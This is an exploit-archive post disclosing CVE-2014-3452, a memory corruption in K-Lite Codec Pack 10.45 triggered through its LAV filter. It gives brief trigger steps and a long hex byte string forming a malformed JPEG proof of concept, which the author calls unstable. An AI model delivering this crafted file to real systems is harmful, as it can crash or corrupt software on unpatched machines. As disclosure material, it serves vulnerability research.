Home / exploits

PDF

K-Lite CODEC 10.45 Memory Corruption

Posted on 15 May 2014

# Exploit Title: [k-lite Codec memory corruption in latest Version 10.45 ]
# Date: [2014/05/12]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.k-litecodec.com]
# Software Link: [
http://filehippo.com/download_klite_mega_codec/download/5d5a43f1ba3077f61abd35f382d7864a/
]
# Version: [Version 10.45 and prior to that]
# Tested on: [Windows Xp Sp 3 x86 & Windows 7 sp1 x86]
# CVE : [CVE-2014-3452]

details:

K-lite Codec latest version 10.45 suffers from an Exploitable memory
corruption Vulnerability via a malformed .jpg file format when load K-Lite
Codec PackFiltersLAVavfilter-lav-4.dll.
Note: For trigger this issue use of Drang and Drop in Media Player Classic.
#This Poc is not Stable.

Poc:

value
="xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64x00x64x00x00xFFxDBx00x43x00x03x02x02x02x02x02x03x02x02x03x04x03x02x03x04x05x03x03x03x03x05x05x04x04x05x04x04x05x07x05xBDx06x06x06x05x07x07x08x08x09x08x08x07x0Bx0Bx0Cx0Cx0Bx0Bx0Cx0Cx0Cx0Cx0Cx0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0ExFFxDBx00x43x01x03x03x03x05x05x05x0Ax07x07x0Ax0Fx0Cx0Ax0Cx0Fx12x0Ex0Ex0Ex0Ex12x11x0Ex0Ex0Ex0Ex0Ex11x11x0Ex0Ex57x0Ex0Ex0Ex11x0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0Ex0ExFFxC2x00x11x08x00x4Bx00xC0x03x01x11x00x02x11x01x03x11x01xFFxC4x00x1Cx00x00x00x07x01x01x00x00x00x00x00x00x00x00x00x00x00x01x02x03x04x05x06x07x08x00xFFxC4x00x1Bx01x00x02x03x01x01x01x00x00x00x00x00x00x00x00x00x00x03x04x00x01x02x05x06x07xFFxDAx00x0Cx03x01x00x02x10x03x10x00x00x01xAFxF9xEDx24x4CxFAxADx55xA2xA6x05xFBxDCxF1x73xDFx1BxD9x43xD7x21x7ExE3x77x73x16xD7xEDx41x5Fx3Ex72x7Dx3BxB0xB7x62xB5xB3xC4x78x11x23x59x2Bx81x71x4Dx42xC8x32x7Bx50xB2x7Bx55x14xC4x5Dx7Ax30xB6x1AxA5xEFx10xFDxCDxBFx12xA6x6Bx3AxEEx7AxB5x37x41xD2x42xC7x21x23xD8x6Ax13x5ExD7x7AxC7x91xE7x4Ax79xC6xC3x18xEAx05xC0xB8x12x16x4Fx6Ax8Fx2Dx89x2Cx96x35x33xA2x55x81xAAx0FxA9x77x00x8BxCCxB5xA9x6ExF0x8Dx87xB6xF5x5Cx74xAFx4Ax9Bx8Dx59x42x5Dx65x6Ex94xD6x35x9Ex8FxCDxC4x81x74x24x34x89xEExBDx51x3Bx83x22x5AxD0x6Cx6Bx63x4Dx4BxA1x2Ex5FxC3xBEx73xA9x1Bx0BxA5xBDxCAxC8x08xA7x6BxE2x70xAAxEExC5x60xD3x63xDBxD1x1Bx46x03xD7x0Dx30x1Ex93xC6xC0x65x1Ax0Fx8Fx74x35x65x91x3Ax8AxD4x21x34xDEx0Dx33xDBx95xF5x2CxCBxB0x8ExF4x61x2Cx4Dx0CxA6xCEx60xD0xC8xB7x64x62x70xB8x5DxB0xA5xD3x94xBCxE7x0ExF3xE7x52x7AxCEx27xB4xA1xBCx3Ex8BxCEx52x78xFCxC8x0Ex4Bx66xBAx42x4Fx54x6CxD4x2Ex72xB2xFAx72x3Bx8ExEBx76xE9xECx80xFBx5DxB9x01xD1x05x94xCBx17x59x66xB8x65x57x9Ex8CxAFxFDx07x06xB2xEAxA4x55xA2x71x3BxB7xAEx7Fx5ExD4x50xC6x33xE4xABxFCx16xBDx21xE4x42x5FxAEx8Cx1Ax12x45xC7xAAxC7x44xB1x6Fx5Bx81xE6x70x49xECxFDx37x31x72x8BxB6x31x38x7Ex98x4BxA9xCFx97xE9x72xA9x9CxAExB3x46x53x47x9CxC2xE1x62xF8x91x24x38x70x97x45x90x92x04xB4xE5xB8xC6x07x51xB9x2Cx73x1Bx86xDEx6Ax2Fx75x72xF4x97x99x9ExBBx6Bx13x8Cx3Ax68xC9x76x39x95x25x8Bx0AxA3xCCxF1x85x87x7Ax37x51x39x0Fx1FxD2x6BxC4x74xB7x86xB2x7Ax5AxF2x9Ax6Fx45x16x13x3Dx38x16xBDx8Bx53x10xADxD0xD4xD4xBBx9BxAFxB1x9Ex97xCDx70x13xEAx57x68x4FxCFx4Cx44x4Bx09x45x64x65x7Dx01xD0xD6x7Ex75xD9x27x26x0Fx74x9Cx84x90x25x90xD1x03xE0xC0x8Ex96xD8x12x97x92x1FxA3x52xDCxBDx68xFEx8Bx78x2Bx02xEFx7AxBEx23xEBx73xE8xC3xA9x39x94xE8xB7xD6xD5x97x6Dx6Bx5CxDDx37xC0xF5x91x41x8Fx5Cx4ExA0x48x9DxCFxFFxC4x00x2Bx10x1Dx01x03x03x04x00x05x04x03x01x00x00x00x00x00x00x03x01x02x04x00x05x11x06x12x13x14x15x21x22x23x24x10x31x32x33x16x34x35x41xFFxDAx00x08x01x01x00x01x05x02x42x7CxF5x92xE5x9Ax1Ex42x4ExFBx4Dx13xDEx39xC4x92x33x5Bx7Dx66x04x27xB8x16x29x2Cx7CxF5x78x9Cx2Bx8Cx4FxEAxDDxAEx0Fx8DxA8xD9x38x8Cx62xF8x7DxE4x24x81x30x71xB2xEAxDDx8AxCBxB3xB9xD4xAEx7Dx6Fx75x6FxADxD5x97x25x35x9BxE7x0Dx11x24x0FxD3x25xBEx73x59xBBxB5x1Ex64xC2x5Cx23x9Bx96x1Fx0Bx03x6Bx47x8DxAFx5Dx39xDAxB9xC6x4Cx47xD4xB2x9Cx3Dx51x1Ax66xD5x63x54xC3x94x39xD2xE1x19x0Ax12x6ExCAxAEx2Bx72xD6x73xF4xCAxFDx32xB8xC2xA4xE6xE5x65x23x7Ex48xDDx89xAEx2Ex24xDAx59xEEx5AxDEx02x46x40x95x6Dx46x03x4AxD9x56xF0x8AxE3x1Dx31x1Fx52xB9xBFxC8xF9x9Dx1Dx61xDCx1Cx25xB6xDDx58x64x97x16x34xD1x4Bx81x22x1Dx66xBFxEDx2AxAAx57xA6xB2xD4xAEx4Ax54xC4xA0xA2xF6x91x17xB2x27x3Dx25xC5x1Bx79xADxB0x88xE8xB1x1Cx10xDBxE5xCEx4ExACxB9x9Cx30xDExAFx34xF0xFExADx5Bx97xEAx98xA0x94x4AxF0xF9x31xE2xC2x94xE0xD4x0BxB6xEAx8Dx2Cx6Fx79x61xDBxD5xD2x2Cx51x4Cx15x47xA2xF9xD2x7Dx1Ax95xF7x96xCCx24x96x23x89x26x2Bx38xCFx6Cx10x12x9Dx70x71x6BxB4xBDx47x93xD0x10x2Bx44xF4x6BxAExC2xFDx5Ax9Fx09xAAx2Dx05xE2x02x4Dx62xB7xBCx32xCBx0CxADxB5x12xE7xB2xA1xDCx79x46x42xC9x90x97xE0xB4x77x2DxA8x94xE4xCAx2Ax62x92x9AxF5x24xC0x8DxDCxF1xDCx88x70x35x37x18xCDx41x58xCFxADxFCx6Cx5FxC1xA8x55x86xCDx59x7Ax09xC5xFAxF5x10x50x9Ax9Cx63x44x0Cx00x20x82xD5x89x6Fx04x87x09x94x22x2Ex61x5Fx40xC1xD8xAEx7Cx97x3BxB9x44x47xAEx6Bx35x8Ax56xAEx42x8Cx6Ax03x1CxC2x47x73x09x11x1Dx26x23x65x23x62xC9x40xBAxDBx2Dx94x4Bx54x5Cx42xF8xE4x2BxF9x6Ex63xFDx7Ax88xCFx6ExA0xB6x5Bx19x29xB7xF5x2Cx0Bx7CxF6x46x33x4Ax4DxF5xCAxF1xD2x3Fx7Dx43x86x78x24x72xEFxADxB4xB4x99x5Ax5DxDBx84x9Fx21xBBx7Bx01x5Cx90x47x5ExC4x26xF1xC7x44x73x6Dx52x1AxDCx1BxDBxA2x11x93x9Ex68xE4x0DxC5x9Fx81xA4x5Bx47xACxA3xDEx74xEDxBDx97x7BxA1x6ExC0x62xABxD1x7Dx6Ax08xDCxE5xB2x5Ax18x23x4Ax6BxF7xD2xD7x9Dx61xD4xD6xAAx53x1Ax11xC8xCEx64xC5xCBx9Dx10x41x68x80xADx64x64x63x56xDDx2BxDBx79x3DxD2xB7x8BxB2xBAx7BxB3x35x9Fx86xA8x12xF8xF1x8ExE6x0Ex1Cx96x21x40x3DxD5x1Ax33xCExF7xDBxD6x04x72x8DxEBx22x49xB9x0Ex8AxE5xA4x6Dx2Ex1Bx59x75x67xC9x31xDCx5Cx76x61x63x11x31xC7xE9xF0xE3xE3xC3xEExC7xCCxBBx7Bx13xB1xC0xBBx7Cx45x9Fx8ExADxFFx00x56x47x1Fx19x76xF1xC7xDBx9Dx3BxB7xB5x72xDBxE1xF6x9Cx6CxD5xDFxCAxBCxA9x71x5Ex54xBBx6BxFFxC4x00x2Cx11x00x02x02x01x03x02x04x04x07x00x00x00x00x00x00x00x00x01x02x03x11x04x10x21x12x31x13x20x22x30x05x14x41x42x23x33x51x71x91xB1xC1xFFxDAx00x08x01x03x01x01x3Fx01x1Cx84x32xD5x98xB4x51x44xD6xA1x7Ex9FxE9xA9x7Cx1Ax78x66xDEx4FxB7x7Dx1CxF1x52x14xE2xCBx74xCAx68xB7x4ExE1x9Fx69xECx89x0Cx95x71xE9xCEx39xC9x6Fx26x9ExBEx44xB8x1Cx76xAAx4FxA1x10xC2x04x2Dx35x51x76x55xD3xF5x2CxADxC5xFBx68x92x22xF9x25x93xC3x52xE1xF7x34xBAx59xE1xF1xFBx13x58x13xDAxA9x2Ex92x4Cx85x98x21x2FxA9x6Dx70xB5x72x6Ax74xCEx99x63xE8x63xD9x46x4Cx15x69xE5x32x9Ax23x1Ex49x4Bx0Bx82xF7xBDx62x4Dx9Ex19x54xB0x42x64xA1x09xC3xA6x46xBFxE1x5Ex04xF3x99x63xFAx23x74xBExDFx51xA2x95xE7x5Bx69x34xFDx7DxCEx23xC2x27x61x2Bx59x6Fx6DxD7x63x48xD2x4Cx9Dx8Bx07xCDx24xC8x5Cx9Fx62x16x0Dx46xC8xE1x9Fx13xD1xBDx37xAEx06x8ExCExB8xF9x73xB2xDBx4Fx25xD3xFCx13x98xF2x4ExE8x91x9FxA0x79x68x44xEBxE9x46xAFx5AxF3xD3x13xD5x23x4BxAAx9Dx7Cx32xABxF2xB8x21xABx46xB6xE5x2Ax9Ax34xB1x69x3Fx16x31xB2xDAx17x61x1Ex28xEDx1Dx39x79xC9x0FxCBxDFxE7x23x1Ex19xAExD7x2FxB4xA1x75x4Cx4Bx03x5Cx95x5CxE2x85xABx23x7Fx5Cx4Cx79xD7x95x90x7Ex9DxF5xB9xEAx25x54xD9x54x65x07x91x5Bx91xF7xDAx56xBCxE0xD2xAFx49x3Fx71x91xECx3DxADx7Cx88x6Bx8DxA4xF0xCBx25xCFx04x8Ax1FxE1xA1xBFx7AxC1x16x77x23xDFx7BxF6x65x1DxBCxDFxFFxC4x00x2Fx11x00x02x01x02x04x05x03x03x03x05x00x00x00x00x00x00x00x01x02x03x11x04x12x21x31x05x10x22x32x41x13x20x51x61x71xF0x23x24x81x30x33xB1xC1xD1xFFxDAx00x08x01x02x01x01x3Fx01x70x79x4Fx4Fx2Cx2Fx2Dx3Ex09xCExD4xACx99x9Ex5Ex9ExA5x09xB5x28xCBxE1x9Cx5ExBDxF0x59xE1xAFx4FxF9xD0xE1x72xFDxD4x7ExA8xE2x12xB6x19xC5x79x30xD1xE8x12x1ExE6x26x97x55xC4xACx49x46x5Bx95x29xC9x7Dx8Bx97x2FxCExE2x2Ex5CxADx34xA1xD2x4Ex6Ex51xB3xD4xBFx48xD5xE2x45x74x94x6Ax35x87xCAxEFxAAx38x75x0CxB5xA2xFEx87x16xC5x4Dx49x41x33x0CxFAx4CxC3xDCxAAxBAx87x12x71x19x52x3FxD1x7Bx16xB4x6Ex54x6AxC6xB9x0Ax70xCCx8Cx55x7Bx52xFAxF8x30x58x85x42xBCxBExA6x36x14x71x16x9AxBEx7Fx3Fx0Dx14xAExB4x22xB5xD4x64xD7x51x24x4Ax23x43x47xA4xEDx73x3AxE7x94x7CxEFx74x4BxB0x8Fx4BxE1xD1x76x56xADx68xC5x23xD1x9CxF5x64xADx7Bx89x94xA2x25xA9x2DxC9xB2xE4xACx4Ax28x68xA7x52x50x95xD1x85x95x1Cx4Cx7Bx63x9BxE2xBFxBFxB7x93x88x70x3Ax5Ex3Ax3FxDFxF1xF9xF6x2Ax53x94x1Dx9AxB0x9Fx27xCAx51xE9xB9x28x4Bx26x84xA3xE9xC1x32xBDx47x28x22x85x1BxC5x36x5DxDAxC5x85x14x53x64x58xF7x1AxD4xADxB9x08x8Bx0Dx74x4Ax83x4Cx70x62x59x25x98xE1xF8x95x5FxF4xE7xF9xFFx00x3Fx83x8ExD3x70xC4xDBxE9xF7x13xE4xF9x54x51xF4xEDx2DxCAxF5x16x55x94x9Dx46xD1x3DxD1x4ExCEx9AxB1x18xF2x8Dx37x72x51xEBx2Cx32xA4xFEx0Bx39x18x5Cx0Ax4Bx33x21x92x0Fx53x1Dx87x84xF5x89x38x12x83x30xD1x6Ax68xE3xB5xE1x3AxAAxCFxC7xB6xB5x42xE4xBBx47x02x95xE1x64xCFx56x2BxC8xB1x70xF0x47x8Ax4Bx01xA5x99xDFx93x23x81x93x30x7Cx3DxB7x76x63x2Fx4Ex90xDEx62x73x56x27x1Bx8Fx08x71x17x2Cx3BxCBxE5x8Fx57xEDxA9x15x61xA5x96xE3xEDx1Cx62x95xE4x62x6Bx37x25x6Dx8AxB5x3Ax88xBExA6x61xE9xBBxDDx14xB6xE4xCCx0Bx4Fx56x46xBCx20xB4x2BxD7x55xA3x62xC8x96xC4x56xA5x1Cx34x77x38xECx94xB1x04x57xB6xA2xE9x44xA3xD2x4Ax11x8Cx55xCAxCFx36xA5x8Bx75x94x28xF5x49xB2x94xD4x60xD2x29xECx5Fx94x53xF0x4Ax44x67xA9x07xBDxC7x0CxC5x3Ax36xDCx47x11x4Dx62x27x7Fx91x7Bx6Ax76x14xBBx7Cx18xADx91x3Dx87xE0xA5xDFxE0x95xECxF7x20x52xEDx10xCAx7DxA3xFCxBFx2Fx25x12x5Bx1Ex0Ex27xFDxE9x7DxC8x8FxD9xFFxC4x00x40x10x00x02x01x02x04x02x05x09x05x07x03x05x00x00x00x00x01x02x03x00x11x04x12x21x31x13x51x05x22x32x41x71x14x23x33x52x61x81x91xA1xB1x10x42x72x82xC1x20x43x62x73x92xA2xC2x24x34xB2x35x44x54xD1xE1xFFxDAx00x08x01x01x00x06x3Fx02x9Fx53xD9x4FxD6x9Bx84x0Bx04x8Fx21xD6xC3x31x6BxD4xCExE2xDEx6Dx06x56x37xE7x59x53x4Fx33x76xFExBAx69x81x37x54x8DxADxCExCCx6BxA5xA4x8DxF4x9Bx10xBCx3Ex65x17x84xA4x8Fx0Ax95x2Ex47x59x9BxE0xF4xF2xB1x37x7Fx32x3DxA5xCFx75x74x36x12x44x96x18xEDx29x72xE0x65x61xC2x3Dx96x52xC3x4Ex46xD5x89x8Fx31xB2xC2xA4x6AxC7x5Ax87xF9x6BxF4xACx71xD2xC2x5DxCFxE0x15x1Cx92x30x92x38xFAxC4x81x6BxDBx51x9Bx7AxE3x62x2Ex32x03x6ExB6x53xAFx7Dx1Cx5Ex47xF2x5BxE5xA4x5Cx56xA4xD6xE6xBBxFEx35xB9xADxCFxBExBFxFBx5DxF5xB9x15x7Bx9AxC4x89x54x5BxAAx42x9Bx35xBDxF5x38x02xC2xD1xFDx0Dx4DxF8x63xFDx69xF9xF0x53xFEx6Dx52x6BxFBxA4x3FxDCxD4x30x91xB3x8Cx32x99xC9xCBxD8x31xB8x5Bx8DxB9x8AxAEx95x49x16x96xCEx01x20x75x8ExE6xB0xB9x7Dx30x11x12x7BxFAxEDx7AxE8x69x25xEAxC3xD7x67xB7x70xE0x35xEBx11x8BxC3x63xB0x4Fx87x78x95x40x69x72xB7x57xD8x45x44x3Fx81x7Ex95xD2x57xECx71xFEx8Ax28x30x1Cx4Bx9ExC1x6Bx29xA6x68x0Ax79x49xD5x11xCDxE3xBFxF1x5Ax8Cx11xC7x16x1Cx30x17x80x36x7DxBBx81xD8x51x8DxD0xABxAExE0xD6xA3x4AxBFxECx69xF6xCAx54xEEx8BxF5x35x37x3Bx47x7FxE9xA7xD0x01xC2x4FxABx54xA7x94x31xFFx00xC9xAAx5ExB6xBCx05xB0xE6x49x6Bx54x8CxC9xA2xFAx53xB1x62x6FxA5xEAx28x66x99xE0x42xAExD2xF0xD7x88x19x40xBCx6BxF1xF0xF1xAFxF5x43xCFx2Bx43xC1x91x4Fx55xE2x05x45xECx75xAEx8DxC3x31xB2xB2x48xA4xFBx0Cx2Cx3Fx5Ax75x1Dx6BxC2x8Cx79x8Bx92x2DxF2xA8x87x24x01xA5x74x9Ax49xA3x1Cx43xDBxC2xBBxCCx5CxB9x50x2Ax7Ax87xBCx52x87xEDxEDx7FxD6xADx30xEBx6Cx92x0ExD2xD1x67x19xA0x1FxBEx5ExCExBCxF9x56x9FxB7x26xBAxE5x1Fx32x6Bx10x37x36x8FxE8x6Ax5Bx0Dx78x69xFEx55x89x21x73x9Fx36x9CxB6x5BxFExB5x88x77x04xCBxC4xCBxA6xB6x5CxBAx7Cx28xCAxE3x86xA0xBDxD9xBBxECxCDxB5x46x14x5Bx34x5AxB1xF6x8Ax55x5DxBCxDExBEx04x57x44xCAx06x69x9Ex17x21x41x00xFFx00xB7x3AxEBx53xB9x04x0Ex12x1Bx1DxEDx7Ax4FxC2x3Ex95xD2x8DxDFxE5x2Ex3Ex1Ax53x65x57x94x01xDDxADxA9x31x65x6Dx04xBFxDAxDExDEx55x6BxD6x47xDAxACxA6xC7x9Dx1Ex2Cx38x60x64xBDxA5x91x14x0CxDFxDBx4AxD8x37x11x63x5AxF9x70xF9x8Cx91x31xEEx01xCFx3Ax2AxC0xA3xAFx55x94xEEx08xDCx7ExC5xC5x62x3Dx81x3Fx5AxC4x77x31xE1xA8xF7x2DxEAx66x3Dx80x16x3DxEDxA8xACx4Ex4Ex68x2Ex75xFBxB7xACx5Ex27x16x7CxCAx4Ex6Cx80xEAxCCx15x74xF0xA7x5DxA1x0ExF6x03x6ExB1xBDx2AxDFx68xEDxF2xACxACx46x9AxFBxC5x74x44x85xCCxB9xB0xD2x88xC4x80x1Cx99xA0xCCx6CxDBxDAxFFx00x33xC5xC7x6CxB9x70xD1x0BxFAxC7x31xD6x93xF0x8AxE9x3BxFFx00xBBx49xF5xACxBBx5ExE6x8DxCFx54xF6x81xDBxE1x4CxB0xADxA3x79x08x88x2ExBAx13xD5xD2xADx7ExB5x6Fx57x0CxC8xDBx66x06xC7xDCx45x4FxE5x26x29x60x31xB3x48x63x8Cx26x30x81xBBx2Bx2Fx55xF2x6Fx6Dx0Dx31x5Bx95x91x23x93x39xD3x31xCBx66x36x3ExD1x5DxAAxDExDExDFxB7x12x62x36x4BxAAx66x65xEFx51xADx62x43xD9xC8x2Ax76xF5x96xA7x53xA0xBAx0Bx78x2Dx62x3Fx9BxF5x51x58xB5x0DxD6x13x66xCBxF9x54x56x51xDEx49xF8xD0x41xD6xB0xB1x26xADx5Dx0DxE4xFEx9FxC9x25xE1xDBx7CxFEx4Ex2Dx52xE1xE4x83x08xE4x2AxEBx2Cx3Dx6Fx7ExBDxD4xBEx02xBAx4DxCDxEDxE5x72x5BxE3x4FxD6xD3x29xD8xD2xE2x71x06xC5x96xEBxC4x19x91x73x0DxC8x3BxD1x11x23x2Fx95x39x84xE2xE6x39x67x8ExDBxA8x50x34x0Dx48x91x8Bx04x40x87xC4x50x22xB8x2Ex6CxFBx0Fx1Ax86xECx32x66xEBx7Ex0Bx1CxDFx2Ax84x46x6Ex63x88x23x78xFExCCxAAx43x69x34x81x7Cx2Fx58x82x34x04xA7xC9x2Bx12x7Bx95x94x1FxE8xA9xBDxB2x7Fx88xA6xC4x42xD6x91xA6x7BxFFx00x12xDExD4xD2x24x77x44xCCxC5xF4xEExF6xD2x99x72x24x6Cx50x66xCDx73x77x36xDAx91x15x88x25xC2x33xE9xDFx5Dx05x98xFAx18x24xB9xEExEAxC2x35xACx45xC5xB2xAAxAFxF7x5ExF4xBEx02xBAx46x35x1FxF7x52xEBxF9xA9xF1xB3x33xAAxC6xE6x3Cx9ExBCx8BxF7x45x45xC5x3Ex79xA5x59x18xEEx01x1AxE5xB7x2Ax9FxC9x54x85x69x04x82x59x09xD4xE5xD7xA9xDDx4Ax54xDCx64x1AxFBxAAxFFx00x74x6Ex28x15xEFxE7xA5x24xB3xB2x37x15x6Ex8Bx09xCEx32xFBx4Dx69xF6x6Dx5BxD5x85x62x3Dx93x1Dx7Cx40x35x2AxAFx25x6FxA8xACx4FxF3x7Ex88x2Bx10xB1xE5xB0x7DxDBxF0x8BxEDx45x57x29x2AxF2x03x9BxF8x4Dx01xEBxC5x98xFEx6Ax88x7AxD3xC6x3Ex1AxFEx95x19xB7xA1x95x45xCDx74x66x1Fx09x88x19x1Bx09x38x99xE3xB3x32x8Ex1Ax8Bx58xEDx7Ax39x7AxCAxD0xA6x7BxEFxDAx3FxFAxA5xF0xAEx91x6Ex90xB3x61xFCxAEx51xD6x19x95x4DxFBxC5x4AxB0xCCxEFx91xD9xA1x4CxB7x24xBExE6xFAx50x12x22xAAxA7x59x7DxBEx35x9Ax56x2Fx61x6BxB5x12x3Ex5Ax52x45xDExE7x28xB7x33x46x10x6Dx8Fx0BxC6x87x37x59x0AxDFx2BxA1x1CxD4xD2xB7x0Fx84x42xD9xA2xF5x5AxFAxDBxD9xF6xE9x5ExCAxF6x56x29x72x93xE7x54xF3xFBx82xA4x0BxBEx44xFAx9Ax9Fx9Fx1Dx75xCFxB8x54x9CxF8xCFxEFxD6xA4x36xEAx86x98xDFxF3x1Ax5CxC6xDFxE9xFFx00xC6xB0x9Bx9BxC9x9Bx5FxC1x50x71x05xB2x97x65x1Fx96xBAx35xB1x2DxC3x8BxC8xE5xD3x48x3Bx81x09xADx3Ex22x3Cx6Ex0FxC9x78x2Ax8AxCFx35x98xB2xB1x3Bx5Bx4Ax5Fx0AxE9x06x53xA2xCFx24x8Fx6Dx3AxEExF6x0Bx4Bx18x0DxC3x0DxABx49x6DxCDx65x95x2Fx19xECx33x5Fx56xE5x59xADxE7x33x12x4FxBExB8x48x2ExFCxAAx3Cx50xFFx00x72x92x2Bx1Ex4Bx47x13x84xF4xEBx97xA5x30x8BxCExEBxE7xA2xFCxC2x9Ex48xD7x47x63x20xB9xEEx6Dx47xD9xD6x6AxD2xB4xADxF5xACx67xE3x4Ex7ExA5x4Dx7CxDDx88xFBx37xE6x79x54xBFxCDx3CxFEx75x26xDEx99xF9xFAxD4xFBx76x66xF5xBDx66xA7xDBxD0x7Bx7Dx4AxC3x5Bx85x9Bx37xDDxE2x67xECx9DxEFxA5x41xB7xEFx3Dx6Fx52xA1xDBxFEx9Dx36xF7xE4x94x7Dx07xDCx66xA8x78x0Ax9Bx35xFDx34x96xF2x8DxBBx47xD1xE5xA3x9Bx87xB8xEDxE7xCBxBFx7DxA9x7Dx1ExE3xB5x9BxE5xEDxA3xD9xDFxF8xAAx7Fx47xE8x4Fx6Bx35xF7xEExA9x7Bx3Bx8DxF3x73xAEx8AxDBxB2x6Dx7Fx49xBBx7CxBCx6BxBBx76xECx76x3DxD5xDDxF3xAFxBBxF3xAExEFx9Dx77x7CxEBxEExFCxEBxFFxC4x00x25x10x01x00x02x02x02x01x04x02x03x01x00x00x00x00x00x00x01x00x11x21x31x41x51x61x71x81x91xB1xA1xF0x10xC1xD1xE1xFFxDAx00x08x01x01x00x01x3Fx21x61x78x3DxF2x33x46xE1x47x68x32xF8x82xBEx01x61x6DxC8xABx29xA9x6ExA1xA9xE7x1FxA6x52xEDxFCxA0xDBx7Dx0AxBAx02x6Ex9Bx4Fx13x45xB9xD7xD8xD4xACxF0x0CxB5x45x70xF4x96x52x0Ex3Bx5Ax06x19xB9xCCxBAx4Ex57x1DxD6x63xF5xBDx61xA7x47x91xAAxD2x11xA1x41xB9x4Dx8Dx8Bx16xA1x35x55x0Ex21xE0xFCx5Ex23x66x93x2Ax8DxD0xA0xDDx3DxD5x47xFDx85xC5xE1x6FxABx0Cx81x85x3FxEDx3Ax07xBCx94x1DxF9xB4xF4x7CxA3x7AxAFx75x33x02xD6x9BxF1x1Bx09xCDxA9x37xC2x0Bx71xB8xF3x64x45x3Cx2Bx33x4Fx7Ax3Cx40xD8x34xACx7Ax51x45xA4xB0xB5x01x47x67x29xAAx48x68x79xAEx41x31x60xC7x71x54x29x0DxD0x1Fx89x62x40x37x2DxA3xDAx03x7DxC9x35x2Ex51xB2x51x9Ax03x19xD1x85x37xC8x5Fx18x31x19xC8x2AxABx63xD0x94x6Ax36x80xE4x61xBBxF8xE6x14x54xDBx0DxC6x98x68xEBxE2x3BxE0xACx36x5Dx1AxE9xEBx19x00xC2xAEx2BxF3x1Ex6FxE1xB0x09xEExCBx39xABx9DxCCx67xEAxA4xA8x1FxC4xC8x2Fx27xCBx22x38x37x16x29xCFx34x0Bx63x02xCCx9Bx6Bx12xEDx42xA9x3Bx0Dx08x1Ex32xABx65x60x71x41x08xF4xC0xA5x30x44x5Bx5BxE1x54x52x6Ex76x90xA2xAAx03x5Cx27xBCx46x14x6Bx9Bx2Ex3Bx86x5Cx00xD0xC0xABx1ExA8xCCxECx0FxB1x9Bx04xEFx3Cx2Ax88xFBxA8x1Bx5Dx91x3AxB4xD6xCAx67x0Fx40xF6xF2xB8x5CxD5xBFxC0x8Fx27x8Dx4Dx38x3Cx4Fx41xE5xF1x16x8Fx04xABx3CxC0x7Dx15xFCx3Bx9Dx2Dx12xFCxA1x6AxFDxA5x34x79xFAx8Bx4Dx39x35xD6x07xE2x5Fx3Fx95x91xD9xA9xB7x3Ax72x82x2Cx2CxD0xABx10x9AxE3xABx64x04x5BxC5xAAx0BxC6x1CxDEx07x6Dx7Bx4BxE8x41x65xADx99x97xAEx8Dx3Cx86x07xE2x5BxF6xE8x96xB9xB4x7Fx70x4Ex01xE9x7Cx9FxC3x4AxF4xD0xA7x45x63x7Fx48x01x3DxB3x2Cx2Fx72xB8x1Dx79xA3xFDx11x68x85x00x17x7Bx99x49x4Ax30xFExE0x05x0CxC5x65xE6x9CxBDx2Ax29x9DxA8x44xD6x9AxF1xCBx5Ax63x90x04x3Ax4Ax90x79x19xADx6Ex0Ax62x97xA9xCEx26x17x8ExA5x52xD5x13xD2x9CxBDx70xA1xDFxFAx25xEBx35x21x6CxADxA6xB7x1Dx29x69xADx6Dx51x69x9AxB9x4Ax8Fx62x14x21xDEx1DxFCx2DxA9xF3x2Cx2Ex64x5Fx4Ax10x28x81x5Ax6CxA2xE5xF6xE5x6Cx56x05x2Ax0Ax1Dx39x94x0AxAFx29x08xBFx6AxF6x98x07xE9x51x23xAFxDDx17x97xA2x5Ex2FxF6xA1xDFxBFx90x77xA3x1Cx94xB1x13x88x36x56x63xEAx3Fx09x36x15x63xEFx0Cx44x8Ax2BxD7xD0x80xF6xF5x86xA9x22x17x20x85xA6x49x49xDFx05x75x77x4CxA5xC1x96xEDxE1x3FxB8x4Ex17xF4xA9xC8x7DxE3x6Fx0Fx0Cx1Bx83x6Dx36x8Cx05x35x13x6FxC9xA0x25x86x18x4Bx62xDCx3Cx35xEBx3Bx3Ex69x9Ex28xC3xB9x7Fx27x48xC7xB4xB4xD6xB1x00x04x51xCCx67xC4xF7x97x1Bx82xDEx26xE8x6Ax1CxE4x83xCDxA4x4Ax56xB2xD8x5Ax9FxAExEAx20xEDx77x0Cx43x99x89xABx28x54xCCx8CxCDx48x12x2ExAEx09x85x8Cx7Bx85x55x5ExDDxF3x51xDFx5Cx9Ax34xACx12x30x85x10xB3x08x26x00x73x3Bx70xB2xFBx65x8Ex6DxD5x50x75xD2xF7xE6x5BxA8x70x63x63x59xEFx3Fx50x6Dx4Cx67x5Ex91x94x3Dx14x74x66x13xA2xE7x2Dx01x1Fx40x3DxCFx1Ex21x32xE7x4FxA0xC3x24xDCx5Ex02x94xE4xAAx8ExABx08x43xDFx2Fx48x35x82x35xD6xE8x0ExAFx99x89x8Dx45x31x72x13x4Fx96x5FxFEx1Ax53xA8x9AxBBx69x2Fx72xCAx61xD6x2Fx89xB8x06xEDx6ExD5x06x58x97x6Bx5BxD8xB6xA6xFAx75x96x84x03xC3x55xCCxA5x03x7AxA9x14xA3x47x8Bx6CxE6x16x46x5Ax32x2Ex17xEFx0Ax96xBDx87x5Ex21x34x05xF1x7Ax5BxE5x96x5Dx1Ax08x9AxB1x02xFCx40xC8x62xB9x95x0BxDDxADx79xC2x58xCAx02x2DxD2x1Ax4DxB8x82xA3x5Cx93xECx3ExF2xA5x37x69xE7x10x67xB7x53x35xE8xE3x90x45x32x56x4Bx2Fx28x88x52xA3x77x6Ex3BxF9x98xD1x97x66xDAxB7x7ExB1x9Dx30xBEx9Bx20x03x82x1Ax0Bx18x7DxB9x00xF0x76x5Ex95x92xFAx85x39x2FxB0x8Dx95x06x8BxA1xF5x29x4CxA9x4Dx4Dx3CxA1x08x38xACx9Ex2DxA0x0DxBFx12xC7x62x76xAAxEFxE3x89x4CxC0x2Dx38xD1x4Fx50x52x83xC6x03xD0x89x95xABxDExC0x10x7Ex5AxD5x2Bx85x29xE6xB8x66x00x75x94xDDx47x96x48xE3x51x6DxF1x2Dx78x75x06x2Bx4B